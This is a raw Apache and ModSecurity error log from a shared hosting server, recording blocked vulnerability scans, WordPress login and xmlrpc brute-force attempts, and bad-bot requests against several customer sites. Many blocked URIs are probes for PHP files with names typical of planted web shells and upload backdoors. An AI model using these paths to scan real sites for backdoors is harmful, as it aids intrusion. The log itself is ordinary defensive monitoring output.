[Tue May 26 17:17:29.911238 2026] [security2:error] [pid 869189:tid 869343] [client 185.192.71.178:29199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/core.php"] [unique_id "ahWIUdB5TZSn88J_orry5wAAABc"]
[Tue May 26 17:17:30.190369 2026] [security2:error] [pid 869189:tid 869434] [client 112.86.225.184:32966] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWIUtB5TZSn88J_orry8QAAAHI"]
[Tue May 26 17:17:30.190495 2026] [security2:error] [pid 869189:tid 869434] [client 112.86.225.184:32966] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWIUtB5TZSn88J_orry8QAAAHI"]
[Tue May 26 17:17:30.408894 2026] [security2:error] [pid 869189:tid 869424] [client 20.205.111.246:1735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/content.php"] [unique_id "ahWIUtB5TZSn88J_orry-wAAAGg"]
[Tue May 26 17:17:30.569980 2026] [security2:error] [pid 869189:tid 869251] [remote 178.104.90.233:48588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWIUtB5TZSn88J_orry9QAACjw"]
[Tue May 26 17:17:30.699611 2026] [security2:error] [pid 869189:tid 869339] [client 185.192.71.176:53033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 176.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/robots.php"] [unique_id "ahWIUtB5TZSn88J_orrzAQAAABM"]
[Tue May 26 17:17:30.839931 2026] [autoindex:error] [pid 869189:tid 869400] [client 43.130.16.140:34928] AH01276: Cannot serve directory /home1/omshriin/public_html/omshriinfra.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:17:31.137943 2026] [security2:error] [pid 869189:tid 869443] [client 185.192.71.178:21077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/inputs.php"] [unique_id "ahWIU9B5TZSn88J_orrzCgAAAHs"]
[Tue May 26 17:17:31.143950 2026] [security2:error] [pid 869189:tid 869379] [client 20.205.111.246:1560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWIU9B5TZSn88J_orrzDQAAADs"]
[Tue May 26 17:17:31.627898 2026] [security2:error] [pid 869189:tid 869438] [client 91.230.225.115:46107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/mini.php"] [unique_id "ahWIU9B5TZSn88J_orrzFwAAAHY"]
[Tue May 26 17:17:31.845669 2026] [security2:error] [pid 869189:tid 869403] [client 20.205.111.246:4076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahWIU9B5TZSn88J_orrzIQAAAFM"]
[Tue May 26 17:17:31.856762 2026] [security2:error] [pid 869189:tid 869426] [client 203.194.101.7:57663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIU9B5TZSn88J_orrzIgAAAGo"]
[Tue May 26 17:17:31.856946 2026] [security2:error] [pid 869189:tid 869426] [client 203.194.101.7:57663] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIU9B5TZSn88J_orrzIgAAAGo"]
[Tue May 26 17:17:31.996925 2026] [security2:error] [pid 869189:tid 869432] [client 185.192.71.172:52211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/goods.php"] [unique_id "ahWIU9B5TZSn88J_orrzIwAAAHA"]
[Tue May 26 17:17:32.036870 2026] [security2:error] [pid 869189:tid 869333] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIU9B5TZSn88J_orrzGgAAAA0"]
[Tue May 26 17:17:32.528203 2026] [security2:error] [pid 869189:tid 869330] [client 20.205.111.246:1743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahWIVNB5TZSn88J_orrzMgAAAAo"]
[Tue May 26 17:17:33.248698 2026] [security2:error] [pid 869189:tid 869418] [client 20.205.111.246:8500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/doc.php"] [unique_id "ahWIVdB5TZSn88J_orrzRwAAAGI"]
[Tue May 26 17:17:33.532451 2026] [security2:error] [pid 869189:tid 869245] [remote 160.250.186.220:45504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIVdB5TZSn88J_orrzTAAAezY"]
[Tue May 26 17:17:33.546754 2026] [security2:error] [pid 869189:tid 869370] [client 91.230.225.117:24753] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/file5.php"] [unique_id "ahWIVdB5TZSn88J_orrzTQAAADI"]
[Tue May 26 17:17:33.977202 2026] [security2:error] [pid 869189:tid 869347] [client 20.205.111.246:1933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/elp.php"] [unique_id "ahWIVdB5TZSn88J_orrzXgAAABs"]
[Tue May 26 17:17:34.434587 2026] [security2:error] [pid 869189:tid 869332] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIVdB5TZSn88J_orrzYQAAAAw"]
[Tue May 26 17:17:34.573017 2026] [security2:error] [pid 869189:tid 869393] [client 185.92.25.57:23347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/ahax.php"] [unique_id "ahWIVtB5TZSn88J_orrzbQAAAEk"]
[Tue May 26 17:17:34.689111 2026] [security2:error] [pid 869189:tid 869439] [client 20.205.111.246:11626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/Exception-class.php"] [unique_id "ahWIVtB5TZSn88J_orrzdwAAAHc"]
[Tue May 26 17:17:35.273923 2026] [security2:error] [pid 869189:tid 869379] [client 185.92.25.49:33607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/f35.php"] [unique_id "ahWIV9B5TZSn88J_orrzggAAADs"]
[Tue May 26 17:17:35.370033 2026] [security2:error] [pid 869189:tid 869389] [client 20.205.111.246:4749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/ee.php"] [unique_id "ahWIV9B5TZSn88J_orrzgwAAAEU"]
[Tue May 26 17:17:35.624601 2026] [security2:error] [pid 869189:tid 869320] [client 185.92.25.49:53635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/simple.php"] [unique_id "ahWIV9B5TZSn88J_orrziQAAAAA"]
[Tue May 26 17:17:36.105463 2026] [security2:error] [pid 869189:tid 869376] [client 20.205.111.246:6574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWIWNB5TZSn88J_orrzkwAAADg"]
[Tue May 26 17:17:36.422381 2026] [security2:error] [pid 869189:tid 869432] [client 185.92.25.56:52599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/amax.php"] [unique_id "ahWIWNB5TZSn88J_orrzmAAAAHA"]
[Tue May 26 17:17:36.852664 2026] [security2:error] [pid 869189:tid 869357] [client 20.205.111.246:9388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahWIWNB5TZSn88J_orrzpQAAACU"]
[Tue May 26 17:17:36.956604 2026] [security2:error] [pid 869189:tid 869346] [client 91.230.225.118:34015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/update/f35.php"] [unique_id "ahWIWNB5TZSn88J_orrzpgAAABo"]
[Tue May 26 17:17:37.251123 2026] [security2:error] [pid 869189:tid 869361] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIWNB5TZSn88J_orrzpAAAACk"]
[Tue May 26 17:17:37.418745 2026] [security2:error] [pid 869189:tid 869323] [client 185.192.71.170:38705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 170.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/hello.php"] [unique_id "ahWIWdB5TZSn88J_orrzrgAAAAM"]
[Tue May 26 17:17:37.582342 2026] [security2:error] [pid 869189:tid 869335] [client 20.205.111.246:9386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/fff.php"] [unique_id "ahWIWdB5TZSn88J_orrzsgAAAA8"]
[Tue May 26 17:17:37.822782 2026] [security2:error] [pid 869189:tid 869427] [client 185.192.71.174:20931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 174.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-admin/maint/bootstrap.php"] [unique_id "ahWIWdB5TZSn88J_orrztgAAAGs"]
[Tue May 26 17:17:38.319651 2026] [security2:error] [pid 869189:tid 869388] [client 20.205.111.246:9857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahWIWtB5TZSn88J_orrzyQAAAEQ"]
[Tue May 26 17:17:38.375926 2026] [security2:error] [pid 869189:tid 869404] [client 185.92.25.52:36543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 52.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/themes/zMousse/otuz1.php"] [unique_id "ahWIWtB5TZSn88J_orrzxwAAAFQ"]
[Tue May 26 17:17:38.891559 2026] [security2:error] [pid 869189:tid 869347] [client 185.192.71.175:54163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/edit-wolf.php"] [unique_id "ahWIWtB5TZSn88J_orrz4wAAABs"]
[Tue May 26 17:17:38.991884 2026] [security2:error] [pid 869189:tid 869421] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIWtB5TZSn88J_orrz1AAAAGU"]
[Tue May 26 17:17:39.056643 2026] [security2:error] [pid 869189:tid 869399] [client 20.205.111.246:11632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/flower.php"] [unique_id "ahWIW9B5TZSn88J_orrz5gAAAE8"]
[Tue May 26 17:17:39.488569 2026] [security2:error] [pid 869189:tid 869430] [client 223.235.98.214:32315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIW9B5TZSn88J_orrz9AAAAG4"]
[Tue May 26 17:17:39.488755 2026] [security2:error] [pid 869189:tid 869430] [client 223.235.98.214:32315] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIW9B5TZSn88J_orrz9AAAAG4"]
[Tue May 26 17:17:39.817255 2026] [security2:error] [pid 869189:tid 869425] [client 20.205.111.246:11600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWIW9B5TZSn88J_orrz_QAAAGk"]
[Tue May 26 17:17:40.310086 2026] [security2:error] [pid 869189:tid 869336] [client 185.192.71.178:63499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/ubh/up.php"] [unique_id "ahWIXNB5TZSn88J_orr0CwAAABA"]
[Tue May 26 17:17:40.491349 2026] [security2:error] [pid 869189:tid 869359] [client 20.205.111.246:2060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWIXNB5TZSn88J_orr0EgAAACc"]
[Tue May 26 17:17:41.205799 2026] [security2:error] [pid 869189:tid 869403] [client 20.205.111.246:11504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/g.php"] [unique_id "ahWIXdB5TZSn88J_orr0KQAAAFM"]
[Tue May 26 17:17:41.397791 2026] [security2:error] [pid 869189:tid 869348] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIXNB5TZSn88J_orr0JQAAABw"]
[Tue May 26 17:17:41.539886 2026] [security2:error] [pid 869189:tid 869335] [client 45.151.139.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIXdB5TZSn88J_orr0MgAAAA8"], referer: https://www.anujtradingco.com/
[Tue May 26 17:17:41.810173 2026] [security2:error] [pid 869189:tid 869343] [client 185.192.71.167:63535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-admin/images/bootstrap.php"] [unique_id "ahWIXdB5TZSn88J_orr0OQAAABc"]
[Tue May 26 17:17:41.936553 2026] [security2:error] [pid 869189:tid 869427] [client 20.205.111.246:9374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWIXdB5TZSn88J_orr0PAAAAGs"]
[Tue May 26 17:17:42.445978 2026] [security2:error] [pid 869189:tid 869439] [client 203.194.101.7:57999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIXtB5TZSn88J_orr0QQAAAHc"]
[Tue May 26 17:17:42.446124 2026] [security2:error] [pid 869189:tid 869439] [client 203.194.101.7:57999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIXtB5TZSn88J_orr0QQAAAHc"]
[Tue May 26 17:17:42.653859 2026] [security2:error] [pid 869189:tid 869408] [client 20.205.111.246:9858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahWIXtB5TZSn88J_orr0SwAAAFg"]
[Tue May 26 17:17:42.818128 2026] [security2:error] [pid 869189:tid 869345] [client 45.151.139.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIXtB5TZSn88J_orr0TgAAABk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 17:17:43.300863 2026] [security2:error] [pid 869189:tid 869321] [client 104.28.196.58:41556] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "amslca.com"] [uri "/ms-themes.php"] [unique_id "ahWIX9B5TZSn88J_orr0YQAAAAE"]
[Tue May 26 17:17:43.378946 2026] [security2:error] [pid 869189:tid 869443] [client 20.205.111.246:9382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/in.php"] [unique_id "ahWIX9B5TZSn88J_orr0YwAAAHs"]
[Tue May 26 17:17:43.653010 2026] [security2:error] [pid 869189:tid 869437] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIX9B5TZSn88J_orr0YAAAAHU"]
[Tue May 26 17:17:43.906833 2026] [security2:error] [pid 869189:tid 869420] [client 91.230.225.121:61251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 121.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/images/upload.php"] [unique_id "ahWIX9B5TZSn88J_orr0bgAAAGQ"]
[Tue May 26 17:17:44.113200 2026] [security2:error] [pid 869189:tid 869335] [client 20.205.111.246:2059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWIYNB5TZSn88J_orr0dQAAAA8"]
[Tue May 26 17:17:44.434029 2026] [security2:error] [pid 869189:tid 869400] [client 185.192.71.166:55721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/seoplugins/db.php"] [unique_id "ahWIYNB5TZSn88J_orr0fAAAAFA"]
